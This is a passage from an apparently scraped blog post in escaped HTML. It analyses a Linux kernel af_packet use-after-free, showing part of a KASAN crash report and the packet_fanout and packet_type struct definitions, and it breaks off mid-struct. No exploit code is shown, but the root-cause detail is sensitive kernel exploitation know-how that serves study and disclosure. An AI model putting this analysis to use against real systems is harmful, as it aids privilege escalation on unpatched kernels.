<\/span><span class=\"crayon-e\">inside <\/span><span class=\"crayon-i\">of<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-58\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.845897<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-t\">byte<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">region<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">ffff880067d28000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ffff880067d29000<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-59\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.851443<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-e\">belongs <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-60\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.852989<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">ffffea00019f4a00 <\/span><span class=\"crayon-v\">count<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mapcount<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mapping<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">index<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">compound_mapcount<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-61\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.861329<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000008100<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">slab<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-62\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.862992<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">raw<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0100000000008100<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000180070007<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-63\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.866052<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">raw<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dead000000000100 <\/span><span class=\"crayon-e\">dead000000000200 <\/span><span class=\"crayon-i\">ffff88006cc02f00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-64\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.870617<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">page <\/span><span class=\"crayon-e\">dumped <\/span><span class=\"crayon-v\">because<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">kasan<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bad <\/span><span class=\"crayon-e\">access <\/span><span class=\"crayon-i\">detected<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-65\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.872456<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-66\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.872851<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Memory <\/span><span class=\"crayon-e\">state <\/span><span class=\"crayon-e\">around <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-67\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.874057<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28700<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-68\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.876931<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28780<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-69\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.878913<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">ffff880067d28800<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-70\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.880658<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">^<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-71\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.884772<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28880<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-72\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.890978<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ffff880067d28900<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-e\">fb <\/span><span class=\"crayon-i\">fb<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-73\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.897763<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0125 seconds] -->  <\/p>\n<p>We know that the freed object is a kmalloc-4096 object:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59e6820c9ab16072771578\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  struct packet_fanout {  \tpossible_net_t\t\tnet;  \tunsigned int\t\tnum_members;  \tu16\t\t\tid;  \tu8\t\t\ttype;  \tu8\t\t\tflags;  \tunion {  \t\tatomic_t\t\trr_cur;  \t\tstruct bpf_prog __rcu\t*bpf_prog;  \t};  \tstruct list_head\tlist;  \tstruct sock\t\t*arr[PACKET_FANOUT_MAX];  \tspinlock_t\t\tlock;  \trefcount_t\t\tsk_ref;  \tstruct packet_type\tprot_hook ____cacheline_aligned_in_smp;  };  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab16072771578-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab16072771578-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab16072771578-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab16072771578-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab16072771578-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab16072771578-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab16072771578-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab16072771578-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab16072771578-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab16072771578-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab16072771578-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab16072771578-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab16072771578-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab16072771578-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab16072771578-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab16072771578-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab16072771578-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab16072771578-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab16072771578-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab16072771578-2\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packet_fanout<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab16072771578-3\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">possible_net_t\t\t<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab16072771578-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">num_members<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab16072771578-5\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">u16\t\t\t<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab16072771578-6\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">u8\t\t\t<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab16072771578-7\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">u8\t\t\t<\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab16072771578-8\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">union<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab16072771578-9\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">atomic_t\t\t<\/span><span class=\"crayon-v\">rr_cur<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab16072771578-10\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bpf_prog <\/span><span class=\"crayon-e\">__rcu\t*<\/span><span class=\"crayon-v\">bpf_prog<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab16072771578-11\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab16072771578-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">list_head\t<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab16072771578-13\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sock\t\t*<\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">PACKET_FANOUT_MAX<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab16072771578-14\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">spinlock_t\t\t<\/span><span class=\"crayon-v\">lock<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab16072771578-15\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">refcount_t\t\t<\/span><span class=\"crayon-v\">sk_ref<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab16072771578-16\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packet_type\t<\/span><span class=\"crayon-e\">prot_hook <\/span><span class=\"crayon-v\">____cacheline_aligned_in_smp<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab16072771578-17\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab16072771578-18\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p>and that its <em>prot_hook<\/em> member is the one being referenced in the packet handler when registered via <em>dev_add_pack()<\/em> from <em>register_prot_hook()<\/em> inside <em>af_packet.c<\/em>: <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59e6820c9ab19922582584\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  struct packet_type {  \t__be16\t\t\ttype;\t\/* This is really htons(ether_type). *\/  \tstruct net_device\t*dev;\t\/* NULL is wildcarded here\t     *\/  \tint\t\t\t(*func) (struct sk_buff *,  \t\t\t\t\t struct net_device *,  \t\t\t\t\t struct packet_type *,  \t\t\t\t\t struct net_device *);  \tbool\t\t\t(*id_match)(struct packet_type *ptype,  \t\t\t\t\t    struct sock *sk);  \tvoid\t\t\t*af_packet_priv;  \tstruct list_head\tlist;  };  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab19922582584-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab19922582584-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab19922582584-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab19922582584-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab19922582584-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab19922582584-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab19922582584-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab19922582584-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab19922582584-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab19922582584-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab19922582584-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab19922582584-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59e6820c9ab19922582584-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59e6820c9ab19922582584-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab19922582584-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab19922582584-2\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packet_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab19922582584-3\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">__be16\t\t\t<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* This is really htons(ether_type). *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab19922582584-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">net_device\t*<\/span><span 